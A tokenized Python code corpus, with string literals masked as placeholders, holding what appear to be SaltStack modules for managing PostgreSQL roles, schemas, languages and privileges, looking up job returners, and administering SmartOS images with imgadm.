'<STR_LIT>' , <EOL> createroles = createroles , <EOL> createuser = createuser , <EOL> encrypted = encrypted , <EOL> login = login , <EOL> inherit = inherit , <EOL> superuser = superuser , <EOL> replication = replication , <EOL> rolepassword = rolepassword , <EOL> groups = groups , <EOL> runas = runas ) <EOL> def group_remove ( groupname , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_remove ( groupname , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> def owner_to ( dbname , <EOL> ownername , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> sqlfile = tempfile . NamedTemporaryFile ( ) <EOL> sqlfile . write ( '<STR_LIT>' ) <EOL> sqlfile . write ( <EOL> '<STR_LIT>' . format ( <EOL> dbname , ownername <EOL> ) <EOL> ) <EOL> queries = ( <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ) <EOL> for fmt , query in queries : <EOL> ret = psql_query ( query , user = user , host = host , port = port , <EOL> maintenance_db = dbname , password = password , runas = runas ) <EOL> for row in ret : <EOL> sqlfile . write ( fmt . format ( owner = ownername , n = row [ '<STR_LIT:n>' ] ) + '<STR_LIT:\n>' ) <EOL> sqlfile . write ( '<STR_LIT>' ) <EOL> sqlfile . flush ( ) <EOL> os . chmod ( sqlfile . name , <NUM_LIT> ) <EOL> cmdret = _psql_prepare_and_run ( [ '<STR_LIT>' , sqlfile . name ] , <EOL> user = user , <EOL> runas = runas , <EOL> host = host , <EOL> port = port , <EOL> password = password , <EOL> maintenance_db = dbname ) <EOL> return cmdret <EOL> def schema_create ( dbname , name , owner = None , <EOL> user = None , <EOL> db_user = None , db_password = None , <EOL> db_host = None , db_port = None ) : <EOL> '''<STR_LIT>''' <EOL> if schema_exists ( dbname , name , <EOL> db_user = db_user , db_password = db_password , <EOL> db_host = db_host , db_port = db_port ) : <EOL> log . info ( '<STR_LIT>' . format ( name , dbname ) ) <EOL> return False <EOL> sub_cmd = '<STR_LIT>' . format ( name ) <EOL> if owner is not None : <EOL> sub_cmd = '<STR_LIT>' . format ( sub_cmd , owner ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , sub_cmd ] , <EOL> user = db_user , password = db_password , <EOL> port = db_port , host = db_host , <EOL> maintenance_db = dbname , runas = user ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def schema_remove ( dbname , name , <EOL> user = None , <EOL> db_user = None , db_password = None , <EOL> db_host = None , db_port = None ) : <EOL> '''<STR_LIT>''' <EOL> if not schema_exists ( dbname , name , <EOL> db_user = db_user , db_password = db_password , <EOL> db_host = db_host , db_port = db_port ) : <EOL> log . info ( '<STR_LIT>' . format ( name , dbname ) ) <EOL> return False <EOL> sub_cmd = '<STR_LIT>' . format ( name ) <EOL> _psql_prepare_and_run ( <EOL> [ '<STR_LIT:-c>' , sub_cmd ] , <EOL> runas = user , <EOL> maintenance_db = dbname , <EOL> host = db_host , user = db_user , port = db_port , password = db_password ) <EOL> if not schema_exists ( dbname , name , <EOL> db_user = db_user , db_password = db_password , <EOL> db_host = db_host , db_port = db_port ) : <EOL> return True <EOL> else : <EOL> log . info ( '<STR_LIT>' . format ( name ) ) <EOL> return False <EOL> def schema_exists ( dbname , name , <EOL> db_user = None , db_password = None , <EOL> db_host = None , db_port = None ) : <EOL> '''<STR_LIT>''' <EOL> return bool ( <EOL> schema_get ( dbname , name , <EOL> db_user = db_user , <EOL> db_host = db_host , <EOL> db_port = db_port , <EOL> db_password = db_password ) ) <EOL> def schema_get ( dbname , name , <EOL> db_user = None , db_password = None , <EOL> db_host = None , db_port = None ) : <EOL> '''<STR_LIT>''' <EOL> all_schemas = schema_list ( dbname , <EOL> db_user = db_user , <EOL> db_host = db_host , <EOL> db_port = db_port , <EOL> db_password = db_password ) <EOL> try : <EOL> return all_schemas . get ( name , None ) <EOL> except AttributeError : <EOL> log . error ( '<STR_LIT>' ) <EOL> return False <EOL> def schema_list ( dbname , <EOL> db_user = None , db_password = None , <EOL> db_host = None , db_port = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> query = ( '<STR_LIT>' . join ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ] ) ) <EOL> rows = psql_query ( query , <EOL> host = db_host , <EOL> user = db_user , <EOL> port = db_port , <EOL> maintenance_db = dbname , <EOL> password = db_password ) <EOL> for row in rows : <EOL> retrow = { } <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> retrow [ key ] = row [ key ] <EOL> ret [ row [ '<STR_LIT:name>' ] ] = retrow <EOL> return ret <EOL> def language_list ( <EOL> maintenance_db , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> query = '<STR_LIT>' <EOL> rows = psql_query ( <EOL> query , <EOL> runas = runas , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> for row in rows : <EOL> ret [ row [ '<STR_LIT:Name>' ] ] = row [ '<STR_LIT:Name>' ] <EOL> return ret <EOL> def language_exists ( <EOL> name , <EOL> maintenance_db , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> languages = language_list ( <EOL> maintenance_db , user = user , host = host , <EOL> port = port , password = password , <EOL> runas = runas ) <EOL> return name in languages <EOL> def language_create ( name , <EOL> maintenance_db , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if language_exists ( name , maintenance_db ) : <EOL> log . info ( '<STR_LIT>' , name , maintenance_db ) <EOL> return False <EOL> query = '<STR_LIT>' . format ( name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def language_remove ( name , <EOL> maintenance_db , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if not language_exists ( name , maintenance_db ) : <EOL> log . info ( '<STR_LIT>' , name , maintenance_db ) <EOL> return False <EOL> query = '<STR_LIT>' . format ( name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> runas = runas , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def _make_privileges_list_query ( name , object_type , prepend ) : <EOL> '''<STR_LIT>''' <EOL> if object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( prepend , name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( prepend , name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ] ) ) . format ( name ) <EOL> return query <EOL> def _get_object_owner ( name , <EOL> object_type , <EOL> prepend = '<STR_LIT>' , <EOL> maintenance_db = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] ) ) . format ( prepend , name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) ) . format ( prepend , name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> ] ) ) . format ( name ) <EOL> elif object_type == '<STR_LIT>' : <EOL> query = ( '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> ] ) ) . format ( name ) <EOL> rows = psql_query ( <EOL> query , <EOL> runas = runas , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> try : <EOL> ret = rows [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> except IndexError : <EOL> ret = None <EOL> return ret <EOL> def _validate_privileges ( object_type , privs , privileges ) : <EOL> '''<STR_LIT>''' <EOL> if object_type != '<STR_LIT>' : <EOL> _perms = [ _PRIVILEGES_MAP [ perm ] <EOL> for perm in _PRIVILEGE_TYPE_MAP [ object_type ] ] <EOL> _perms . append ( '<STR_LIT>' ) <EOL> if object_type not in _PRIVILEGES_OBJECTS : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' . format ( object_type ) ) <EOL> if not set ( privs ) . issubset ( set ( _perms ) ) : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' . format ( <EOL> privileges , object_type ) ) <EOL> else : <EOL> if privileges : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _mod_priv_opts ( object_type , privileges ) : <EOL> '''<STR_LIT>''' <EOL> object_type = object_type . lower ( ) <EOL> privileges = '<STR_LIT>' if privileges is None else privileges <EOL> _privs = re . split ( r'<STR_LIT>' , privileges . upper ( ) ) <EOL> return object_type , privileges , _privs <EOL> def _process_priv_part ( perms ) : <EOL> '''<STR_LIT>''' <EOL> _tmp = { } <EOL> previous = None <EOL> for perm in perms : <EOL> if previous is None : <EOL> _tmp [ _PRIVILEGES_MAP [ perm ] ] = False <EOL> previous = _PRIVILEGES_MAP [ perm ] <EOL> else : <EOL> if perm == '<STR_LIT:*>' : <EOL> _tmp [ previous ] = True <EOL> else : <EOL> _tmp [ _PRIVILEGES_MAP [ perm ] ] = False <EOL> previous = _PRIVILEGES_MAP [ perm ] <EOL> return _tmp <EOL> def privileges_list ( <EOL> name , <EOL> object_type , <EOL> prepend = '<STR_LIT>' , <EOL> maintenance_db = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> object_type = object_type . lower ( ) <EOL> query = _make_privileges_list_query ( name , object_type , prepend ) <EOL> if object_type not in _PRIVILEGES_OBJECTS : <EOL> raise SaltInvocationError ( <EOL> '<STR_LIT>' . format ( object_type ) ) <EOL> rows = psql_query ( <EOL> query , <EOL> runas = runas , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> ret = { } <EOL> for row in rows : <EOL> if object_type != '<STR_LIT>' : <EOL> result = row [ '<STR_LIT:name>' ] <EOL> result = result . strip ( '<STR_LIT:{}>' ) <EOL> parts = result . split ( '<STR_LIT:U+002C>' ) <EOL> for part in parts : <EOL> perms_part , _ = part . split ( '<STR_LIT:/>' ) <EOL> rolename , perms = perms_part . split ( '<STR_LIT:=>' ) <EOL> if rolename == '<STR_LIT>' : <EOL> rolename = '<STR_LIT>' <EOL> _tmp = _process_priv_part ( perms ) <EOL> ret [ rolename ] = _tmp <EOL> else : <EOL> if row [ '<STR_LIT>' ] == '<STR_LIT:t>' : <EOL> admin_option = True <EOL> else : <EOL> admin_option = False <EOL> ret [ row [ '<STR_LIT>' ] ] = admin_option <EOL> return ret <EOL> def has_privileges ( name , <EOL> object_name , <EOL> object_type , <EOL> privileges = None , <EOL> grant_option = None , <EOL> prepend = '<STR_LIT>' , <EOL> maintenance_db = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> object_type , privileges , _privs = _mod_priv_opts ( object_type , privileges ) <EOL> _validate_privileges ( object_type , _privs , privileges ) <EOL> if object_type != '<STR_LIT>' : <EOL> owner = _get_object_owner ( object_name , object_type , prepend = prepend , <EOL> maintenance_db = maintenance_db , user = user , host = host , port = port , <EOL> password = password , runas = runas ) <EOL> if owner is not None and name == owner : <EOL> return True <EOL> _privileges = privileges_list ( object_name , object_type , prepend = prepend , <EOL> maintenance_db = maintenance_db , user = user , host = host , port = port , <EOL> password = password , runas = runas ) <EOL> if name in _privileges : <EOL> if object_type == '<STR_LIT>' : <EOL> if grant_option : <EOL> retval = _privileges [ name ] <EOL> else : <EOL> retval = True <EOL> return retval <EOL> else : <EOL> _perms = _PRIVILEGE_TYPE_MAP [ object_type ] <EOL> if grant_option : <EOL> perms = dict ( ( _PRIVILEGES_MAP [ perm ] , True ) for perm in _perms ) <EOL> retval = perms == _privileges [ name ] <EOL> else : <EOL> perms = [ _PRIVILEGES_MAP [ perm ] for perm in _perms ] <EOL> if '<STR_LIT>' in _privs : <EOL> retval = perms . sort ( ) == _privileges [ name ] . keys ( ) . sort ( ) <EOL> else : <EOL> retval = set ( _privs ) . issubset ( <EOL> set ( _privileges [ name ] . keys ( ) ) ) <EOL> return retval <EOL> return False <EOL> def privileges_grant ( name , <EOL> object_name , <EOL> object_type , <EOL> privileges = None , <EOL> grant_option = None , <EOL> prepend = '<STR_LIT>' , <EOL> maintenance_db = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> object_type , privileges , _privs = _mod_priv_opts ( object_type , privileges ) <EOL> _validate_privileges ( object_type , _privs , privileges ) <EOL> if has_privileges ( name , object_name , object_type , privileges , <EOL> prepend = prepend , maintenance_db = maintenance_db , user = user , <EOL> host = host , port = port , password = password , runas = runas ) : <EOL> log . info ( '<STR_LIT>' , <EOL> object_name , object_type , privileges ) <EOL> return False <EOL> _grants = '<STR_LIT:U+002C>' . join ( _privs ) <EOL> if object_type in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> on_part = '<STR_LIT>' . format ( prepend , object_name ) <EOL> else : <EOL> on_part = object_name <EOL> if grant_option : <EOL> if object_type == '<STR_LIT>' : <EOL> query = '<STR_LIT>' . format ( <EOL> object_name , name ) <EOL> else : <EOL> query = '<STR_LIT>' . format ( <EOL> _grants , object_type . upper ( ) , on_part , name ) <EOL> else : <EOL> if object_type == '<STR_LIT>' : <EOL> query = '<STR_LIT>' . format ( object_name , name ) <EOL> else : <EOL> query = '<STR_LIT>' . format ( <EOL> _grants , object_type . upper ( ) , on_part , name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def privileges_revoke ( name , <EOL> object_name , <EOL> object_type , <EOL> privileges = None , <EOL> prepend = '<STR_LIT>' , <EOL> maintenance_db = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> object_type , privileges , _privs = _mod_priv_opts ( object_type , privileges ) <EOL> _validate_privileges ( object_type , _privs , privileges ) <EOL> if not has_privileges ( name , object_name , object_type , privileges , <EOL> prepend = prepend , maintenance_db = maintenance_db , user = user , <EOL> host = host , port = port , password = password , runas = runas ) : <EOL> log . info ( '<STR_LIT>' <EOL> '<STR_LIT>' , object_name , object_type , privileges ) <EOL> return False <EOL> _grants = '<STR_LIT:U+002C>' . join ( _privs ) <EOL> if object_type in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> on_part = '<STR_LIT>' . format ( prepend , object_name ) <EOL> else : <EOL> on_part = object_name <EOL> if object_type == '<STR_LIT>' : <EOL> query = '<STR_LIT>' . format ( object_name , name ) <EOL> else : <EOL> query = '<STR_LIT>' . format ( <EOL> _grants , object_type . upper ( ) , on_part , name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def datadir_init ( name , <EOL> auth = '<STR_LIT:password>' , <EOL> user = None , <EOL> password = None , <EOL> encoding = '<STR_LIT>' , <EOL> locale = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if salt . utils . which ( '<STR_LIT>' ) is None : <EOL> log . error ( '<STR_LIT>' ) <EOL> return False <EOL> if datadir_exists ( name ) : <EOL> log . info ( '<STR_LIT>' , name ) <EOL> return False <EOL> ret = _run_initdb ( <EOL> name , <EOL> auth = auth , <EOL> user = user , <EOL> password = password , <EOL> encoding = encoding , <EOL> locale = locale , <EOL> runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def datadir_exists ( name ) : <EOL> '''<STR_LIT>''' <EOL> _version_file = os . path . join ( name , '<STR_LIT>' ) <EOL> _config_file = os . path . join ( name , '<STR_LIT>' ) <EOL> return os . path . isfile ( _version_file ) and os . path . isfile ( _config_file ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import salt . loader <EOL> def get_jid ( returner , jid ) : <EOL> '''<STR_LIT>''' <EOL> returners = salt . loader . returners ( __opts__ , __salt__ ) <EOL> return returners [ '<STR_LIT>' . format ( returner ) ] ( jid ) <EOL> def get_fun ( returner , fun ) : <EOL> '''<STR_LIT>''' <EOL> returners = salt . loader . returners ( __opts__ , __salt__ ) <EOL> return returners [ '<STR_LIT>' . format ( returner ) ] ( fun ) <EOL> def get_jids ( returner ) : <EOL> '''<STR_LIT>''' <EOL> returners = salt . loader . returners ( __opts__ , __salt__ ) <EOL> return returners [ '<STR_LIT>' . format ( returner ) ] ( ) <EOL> def get_minions ( returner ) : <EOL> '''<STR_LIT>''' <EOL> returners = salt . loader . returners ( __opts__ , __salt__ ) <EOL> return returners [ '<STR_LIT>' . format ( returner ) ] ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import json <EOL> import salt . utils <EOL> import salt . utils . decorators as decorators <EOL> log = logging . getLogger ( __name__ ) <EOL> __func_alias__ = { <EOL> '<STR_LIT>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> __virtualname__ = '<STR_LIT>' <EOL> @ decorators . memoize <EOL> def _check_imgadm ( ) : <EOL> '''<STR_LIT>''' <EOL> return salt . utils . which ( '<STR_LIT>' ) <EOL> def _exit_status ( retcode ) : <EOL> '''<STR_LIT>''' <EOL> ret = { <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' } [ retcode ] <EOL> return ret <EOL> def _parse_image_meta ( image = None , detail = False ) : <EOL> if not image : <EOL> return { } <EOL> if detail : <EOL> return { <EOL> '<STR_LIT:name>' : image [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:version>' : image [ '<STR_LIT>' ] [ '<STR_LIT:version>' ] , <EOL> '<STR_LIT>' : image [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> '<STR_LIT:description>' : image [ '<STR_LIT>' ] [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : image [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> '<STR_LIT:source>' : image [ '<STR_LIT:source>' ] <EOL> } <EOL> else : <EOL> return '<STR_LIT>' . format ( <EOL> name = image [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , <EOL> version = image [ '<STR_LIT>' ] [ '<STR_LIT:version>' ] , <EOL> date = image [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if salt . utils . is_smartos_globalzone ( ) and _check_imgadm ( ) : <EOL> return __virtualname__ <EOL> return ( <EOL> False , <EOL> '<STR_LIT>' . format ( <EOL> __virtualname__ <EOL> ) <EOL> ) <EOL> def version ( ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> ret = res [ <NUM_LIT:0> ] . split ( ) <EOL> return ret [ - <NUM_LIT:1> ] <EOL> def update_installed ( uuid = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> imgadm = _check_imgadm ( ) <EOL> if imgadm : <EOL> cmd = '<STR_LIT>' . format ( imgadm , uuid ) . rstrip ( ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> return { } <EOL> def avail ( search = None , verbose = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> result = { } <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> for image in json . loads ( res [ '<STR_LIT>' ] ) : <EOL> if image [ '<STR_LIT>' ] [ '<STR_LIT>' ] or not image [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> continue <EOL> if search and search not in image [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] : <EOL> continue <EOL> result [ image [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] = _parse_image_meta ( image , verbose ) <EOL> return result <EOL> def list_installed ( verbose = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> result = { } <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> for image in json . loads ( res [ '<STR_LIT>' ] ) : <EOL> result [ image [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] = _parse_image_meta ( image , verbose ) <EOL> return result <EOL> def show ( uuid ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm , uuid ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> ret = json . loads ( res [ '<STR_LIT>' ] ) <EOL> return ret <EOL> def get ( uuid ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm , uuid ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> ret = json . loads ( res [ '<STR_LIT>' ] ) <EOL> return ret <EOL> def import_image ( uuid , verbose = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm , uuid ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> return { uuid : _parse_image_meta ( get ( uuid ) , verbose ) } <EOL> def delete ( uuid ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm , uuid ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> result = [ ] <EOL> for image in res [ '<STR_LIT>' ] . splitlines ( ) : <EOL> image = [ var for var in image . split ( "<STR_LIT:U+0020>" ) if var ] <EOL> result . append ( image [ <NUM_LIT:2> ] ) <EOL> return result <EOL> def vacuum ( verbose = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> imgadm = _check_imgadm ( ) <EOL> cmd = '<STR_LIT>' . format ( imgadm ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> retcode = res [ '<STR_LIT>' ] <EOL> if retcode != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = _exit_status ( retcode ) <EOL> return ret <EOL> result = { } <EOL> for image in res [ '<STR_LIT>' ] . splitlines ( ) : <EOL> image = [ var for var in image . split ( "<STR_LIT:U+0020>" ) if var ] <EOL> result [ image [ <NUM_LIT:2> ] ] = { <EOL> '<STR_LIT:name>' : image [ <NUM_LIT:3> ] [ <NUM_LIT:1> : image [ <NUM_LIT:3> ] . index ( '<STR_LIT:@>' ) ] , <EOL> '<STR_LIT:version>' : image [ <NUM_LIT:3> ] [ image [ <NUM_LIT:3> ] . index ( '<STR_LIT:@>' ) + <NUM_LIT:1> : - 